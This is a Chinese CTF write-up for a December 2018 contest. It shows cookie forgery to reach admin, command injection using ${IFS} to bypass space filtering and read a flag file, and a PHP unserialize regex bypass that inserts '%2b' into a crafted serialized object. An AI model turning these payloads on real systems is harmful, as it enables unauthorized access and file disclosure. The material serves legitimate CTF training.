签到题

没啥好说的,什么牛不能跑?蜗牛

ezweb2

题目:

http://101.71.29.5:10000/index.php

解题思路:

拿到题目后,扫了一波:

python3 dirsearch.py -u http://101.71.29.5:10000 -e php


发现:admin.php
进入查看,显示无法进入
查看页面信息,发现user登录信息,在存储值可更改。

将其先进行Url Decode,dXNlcg==,然后,Base64 Decode,user
然后,考虑到admin登入,于是将admin先进行Base64 Eecode,YWRtaW4=,在进行Url Encode,YWRtaW4%3D,将其填入存储值中。
然后刷新页面,进入

随便在其中输入,例如:a,抓包截取反应

猜想命令输入,尝试:

ls

得到相应目录
进而尝试:

ls /     //查询根目录

发现,错误,考虑空格过滤
于是尝试:

ls${IFS}/   //利用${IFS}代替空格

得到根目录下的文件目录
发现:
fFlag_404.php
于是尝试抓取该文件:

cat${IFS}/fFlag_404

得到flag:

eazyweb

题目

http://101.71.29.5:10007/

解题思路

进行代码审计
首先对于class baby,定义了一个类
再看下面,首先是绕过正则表达式:preg_match('/[oc]:\d+:/i',$data,$matches)
其中,[oc]代表$data中以o或c开头,:表示含有:,\d表示有数字,/i表示不区分大小写,$data为待匹配字符串,$matches为存储匹配上的字符串
而要满足if(count($matches)) 的话,则需要$data中没有可以匹配的字符串
再往下,看到$good = unserialize($data) ,序列化与反序列化函数,其特点是,一定会有o作为开头,故一定会有匹配
解决办法是,在:与数字之间加入+,且对+进行url编码:%2b
那么,首先将类:class baby实体化,进行序列化:

<?php
@error_reporting(1);
include 'flag.php';
class baby
{   public $file;function __toString()      {          if(isset($this->file)) {$filename = "./{$this->file}";        if (file_get_contents($filename))         {              return file_get_contents($filename); } }     }
}
$a=new baby();
$a->file='flag.php';
echo serialize($a);
?>

得到:

O:4:"baby":1:{s:4:"file";s:8:"flag.php";}

然后,进行文件读取:

?data=O:%2b4:%22baby%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}

得到flag

安恒月赛-2018年12月相关推荐

  1. 2018年12月,华为HCNP大面积更新题目,军哥独家解题咯

    2018年12月,华为HCNP大面积更新题目,乾颐堂军哥独家解题咯 2018年是华为认证变动比较大的一年,华为认证走过这几年不得不说是有一定进步的,而且最近华为孟女侠确实让我也小小的骄傲了一把,所以当 ...

  2. 2018年12月精选文章目录一览

    ↑ 点击上方[计算机视觉联盟]关注我们 文章太多,想要浏览历史消息很痛苦,今天小编整理了2018年12月的精选文章,让盟友们不再困扰一个一个翻阅(再也翻不到头,总感觉后边还有干货,O(∩_∩)O哈哈~ ...

  3. 2018年android手机版本统计,安兔兔发布2018年12月Android手机性能排行榜

    今天,安兔兔根据后台统计到的数据,公布了 2018 年 12 月份Android手机性能榜,这份 2018 年的最终榜单有哪些手机能够杀入前十呢?拭目以待吧. 注:本文图表中的安兔兔跑分(v7 版)均 ...

  4. 微型计算机 2018 12月下,桌面CPU天梯图2018年12月最新版 十二月台式电脑处理器排名...

    时光飞逝,转眼2018还有不到一个月就要划上一个完美句号了.年底将近,近期DIY装机的小伙伴也开始多了起来了.今天小编按照惯例,带来一月一更的台式电脑CPU天梯图更新,希望大家会喜欢.CPU作为电脑的 ...

  5. 数据库系统期末总结(三)(往届试卷2018年12月A卷、B卷、E卷,2019年5月A卷,选择题终篇)

    接着上次的总结:https://blog.csdn.net/qq_41938259/article/details/103532401 这是我对<数据库系统基础>第三次期末总结.这次是剩下 ...

  6. 2018年12月8日国际项目经理PMP培训考试报名中

    一.郑州杰创PMP培训考试介绍 国家外国专家局培训中心2007年起每年授权郑州杰创公司从事PMP培训考试等有关的项目管理资格认证的培训.考生报名资格审核.考试.PMP等证书发放等工作. 二.郑州杰创P ...

  7. 侍魂胧月传说服务器维护,《侍魂胧月传说》2018年12月12日2:00进行全服停机更新维护...

    <侍魂:胧月传说>将在2018年12月12日2:00进行全服停机更新维护,更新预计需要4个小时,请各位武者合理安排时间. <侍魂胧月传说>2018年12月12日2:00进行全服 ...

  8. 安兔兔android手机性能排行榜,安兔兔2018年12月Android手机性能排行榜

    今天,安兔兔根据后台统计到的数据,公布了2018年12月份Android 注:本文图表中的安兔兔跑分(v7版)均为平均跑分成绩,并非最高分:数据收集时间为:2018年12月1日至12月31日:单一机型 ...

  9. 阿里云基础产品技术月刊 2018年12月 1

    [关注最新商用产品技术] TOP1 阿里云弹性计算块存储产品"ESSD云盘"获2018年度云存储产品金奖 12月11日,在第十四届中国存储与数据峰会(Data & Stor ...

最新文章

  1. 如何安装体验 Ubuntu on Windows
  2. 「自然语言处理」如何快速理解?有这篇文章就够了!
  3. python 压缩文件(1)
  4. Android App开发——添加APP启动界面
  5. springboot java.util.NoSuchElementException: No value present 异常处理
  6. 为什么有些xpath绝对路径拿不到数据_Python爬虫,登陆神器Selenium之xpath的使用
  7. Core-java面试题第一套上篇
  8. Bootstrap 源码版文件结构
  9. 【飞行器】基于matlab多源信息融合算法多旋翼无人机组合导航系统【含Matlab源码 1267期】
  10. breadweb控制台下载_路由器刷breed web控制台助手通用版
  11. SegNet论文笔记及其创新点代码解析
  12. 2021年十佳返利优惠券平台排名如下
  13. 解决谷歌翻译用不了的问题
  14. 尔雅国学智慧课后答案
  15. 网络安全概论 第四章 电子邮件安全加密(PGP)
  16. 隐形交通指挥员:浅述城市轨交信号系统
  17. 怎样判断小红书被限流?小红书被限流有这几大表现
  18. 巴菲特:我可以发2100万个巴菲特币|附视频
  19. 如何写好年终总结年终总结应该怎么写
  20. 今天分享一个爱心的表白树,送你对象吧(代码在最后面哦)

热门文章

  1. 你的AI员工,基于大语言模型LLM的自动化工作流是什么样的?
  2. 数字中台全云化,抓住中国新型消费提质升级重要窗口期
  3. 计算机专业同学综合自我评估,计算机专业学生的自我评价
  4. 架构师的黄金证书---TOGAF
  5. [转载]Matlab fmincon函数用法
  6. 辉太郎看前端(xss,sql,CSRF)
  7. 京东、天猫、小米:618电商血战手机
  8. 计算机输入设备由什么和什么和扫描仪组成,计算机输入设备之扫描仪.ppt
  9. How to fix corrupt HDFS FIles
  10. 青海省计算机职业高中学校,青海的职业技术学校有哪些?